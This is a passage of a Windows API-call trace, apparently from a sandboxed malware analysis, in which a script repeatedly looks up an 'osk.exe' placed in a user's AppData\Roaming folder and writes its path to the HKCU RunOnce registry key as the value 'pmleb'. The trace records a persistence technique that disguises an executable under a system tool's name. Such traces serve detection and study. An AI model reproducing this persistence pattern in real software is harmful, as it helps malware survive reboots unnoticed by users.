[5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.192] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x6a 
[0080.192] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.192] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.192] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.192] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.192] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.192] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.192] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.192] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.192] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.192] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.193] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.193] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 
lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.193] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.193] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.193] RegCloseKey (hKey=0x280) returned 0x0 [0080.193] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.193] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.193] SetTimer (hWnd=0x20280, nIDEvent=0x206a, uElapse=0xa, lpTimerFunc=0x0) returned 0x206a [0080.193] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.205] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.205] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.205] KillTimer (hWnd=0x20280, uIDEvent=0x206a) returned 1 [0080.205] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.205] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.206] IUnknown:Release (This=0x787518) returned 0x1 [0080.206] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.206] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.206] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, 
[5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.206] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.206] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.206] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.206] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.206] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, 
[5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.206] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.206] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x6b [0080.207] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.207] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x6c [0080.207] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.207] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x6b [0080.208] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.208] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.208] 
IUnknown:Release (This=0x7a9740) returned 0x1 [0080.208] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.208] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 0x0 [0080.208] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.208] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.208] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.208] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.208] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.208] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.208] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.208] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.208] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.209] RegCloseKey (hKey=0x280) returned 0x0 [0080.209] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.209] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.209] SetTimer (hWnd=0x20280, nIDEvent=0x206b, uElapse=0xa, lpTimerFunc=0x0) returned 0x206b [0080.209] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.221] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.221] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.221] KillTimer (hWnd=0x20280, uIDEvent=0x206b) returned 1 [0080.221] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.221] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.221] IUnknown:Release (This=0x787518) returned 0x1 [0080.221] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.221] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.222] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, 
varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.222] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.222] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.222] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.222] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.222] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.222] FileSystemObject:IUnknown:QueryInterface (in: 
This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x33ef44 | out: ppvObject=0x33ef44*=0x2b53cec) returned 0x0 [0080.222] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x6c [0080.222] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53cec, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f0ac*="Path", cNames=0x1, lcid=0x409, rgDispId=0x33f0d0 | out: rgDispId=0x33f0d0*=0) returned 0x0 [0080.222] FileSystemObject:IUnknown:AddRef (This=0x2b53cec) returned 0x6d [0080.222] FileSystemObject:IDispatch:Invoke (in: This=0x2b53cec, dispIdMember=0, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x2, pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840, pExcepInfo=0x33f088, puArgErr=0x33f084 | out: pDispParams=0x33f074*(rgvarg=0x0, rgdispidNamedArgs=0x0, cArgs=0x0, cNamedArgs=0x0), pVarResult=0x2b53840*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\osk.exe"), varVal2=0x0), pExcepInfo=0x33f088*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f084*=0x2b53cec) returned 0x0 [0080.223] FileSystemObject:IUnknown:Release (This=0x2b53cec) returned 0x6c [0080.223] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.223] ITypeInfo:LocalGetIDsOfNames (This=0x7a9740) returned 0x0 [0080.223] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.223] IUnknown:AddRef (This=0x7a9740) returned 0x2 [0080.223] SetErrorInfo (dwReserved=0x0, perrinfo=0x0) returned 
0x0 [0080.223] ITypeInfo:LocalInvoke (This=0x7a9740) returned 0x0 [0080.223] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 61 [0080.223] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", cchWideChar=-1, lpMultiByteStr=0x33ec50, cbMultiByte=61, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\pmleb", lpUsedDefaultChar=0x0) returned 61 [0080.224] _mbsnbcmp (_Str1=0x33ec50, _Str2=0x74a021e8, _MaxCount=0x5) returned 0 [0080.224] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x2, lpSecurityAttributes=0x0, phkResult=0x33ec28, lpdwDisposition=0x0 | out: phkResult=0x33ec28*=0x280, lpdwDisposition=0x0) returned 0x0 [0080.224] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 54 [0080.224] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cchWideChar=-1, lpMultiByteStr=0x33ec10, cbMultiByte=54, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", lpUsedDefaultChar=0x0) returned 54 [0080.224] lstrlenA (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 53 [0080.224] RegSetValueExA (in: hKey=0x280, lpValueName="pmleb", Reserved=0x0, dwType=0x1, 
lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe", cbData=0x36 | out: lpData="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\osk.exe") returned 0x0 [0080.224] RegCloseKey (hKey=0x280) returned 0x0 [0080.224] IUnknown:Release (This=0x7a9740) returned 0x1 [0080.224] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.224] SetTimer (hWnd=0x20280, nIDEvent=0x206c, uElapse=0xa, lpTimerFunc=0x0) returned 0x206c [0080.224] GetMessageW (in: lpMsg=0x33f7fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x33f7fc) returned 1 [0080.236] TranslateMessage (lpMsg=0x33f7fc) returned 0 [0080.236] DispatchMessageW (lpMsg=0x33f7fc) returned 0x0 [0080.236] KillTimer (hWnd=0x20280, uIDEvent=0x206c) returned 1 [0080.237] ISystemDebugEventFire:IsActive (This=0x7b4480) returned 0x1 [0080.237] CoGetObjectContext (in: riid=0x74a40270*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x33f3b0 | out: ppv=0x33f3b0*=0x787518) returned 0x0 [0080.237] IUnknown:Release (This=0x787518) returned 0x1 [0080.237] FileSystemObject:IDispatch:GetIDsOfNames (in: This=0x2b53a00, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x33f02c*="GetFile", cNames=0x1, lcid=0x409, rgDispId=0x33f050 | out: rgDispId=0x33f050*=10012) returned 0x0 [0080.237] FileSystemObject:IUnknown:AddRef (This=0x2b53a00) returned 0x2 [0080.237] FileSystemObject:IDispatch:Invoke (in: This=0x2b53a00, dispIdMember=10012, riid=0x74a40bb4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), lcid=0x409, wFlags=0x3, pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228, pExcepInfo=0x33f008, puArgErr=0x33f004 | 
out: pDispParams=0x33eff4*(rgvarg=([0]=0x33ef98*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="osk.exe", varVal2=0x1113d0)), rgdispidNamedArgs=0x0, cArgs=0x1, cNamedArgs=0x0), pVarResult=0x33f228*(varType=0x9, wReserved1=0x0, wReserved2=0xf288, wReserved3=0x33, varVal1=0x2b53cec, varVal2=0x0), pExcepInfo=0x33f008*(wCode=0x0, wReserved=0x0, bstrSource=0x0, bstrDescription=0x0, bstrHelpFile=0x0, dwHelpContext=0x0, pvReserved=0x0, pfnDeferredFillIn=0x0, scode=0x0), puArgErr=0x33f004*=0x2b53a00) returned 0x0 [0080.237] FileSystemObject:IUnknown:Release (This=0x2b53a00) returned 0x1 [0080.237] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45700*(Data1=0x9bcb0016, Data2=0xbc2a, Data3=0x47b7, Data4=([0]=0x81, [1]=0x54, [2]=0x85, [3]=0x80, [4]=0xa1, [5]=0x5c, [6]=0x3f, [7]=0xf0)), ppvObject=0x33ef54 | out: ppvObject=0x33ef54*=0x0) returned 0x80004002 [0080.237] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a455f8*(Data1=0x719c3050, Data2=0xf9d3, Data3=0x11cf, Data4=([0]=0xa4, [1]=0x93, [2]=0x0, [3]=0x40, [4]=0x5, [5]=0x23, [6]=0xa8, [7]=0xa0)), ppvObject=0x33ef50 | out: ppvObject=0x33ef50*=0x0) returned 0x80004002 [0080.238] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45608*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x33ef4c | out: ppvObject=0x33ef4c*=0x0) returned 0x80004002 [0080.238] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45764*(Data1=0xa0aac450, Data2=0xa77b, Data3=0x11cf, Data4=([0]=0x91, [1]=0xd0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xc1, [6]=0x4a, [7]=0x7c)), ppvObject=0x33ef48 | out: ppvObject=0x33ef48*=0x0) returned 0x80004002 [0080.238] FileSystemObject:IUnknown:QueryInterface (in: This=0x2b53cec, riid=0x74a45710*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), 
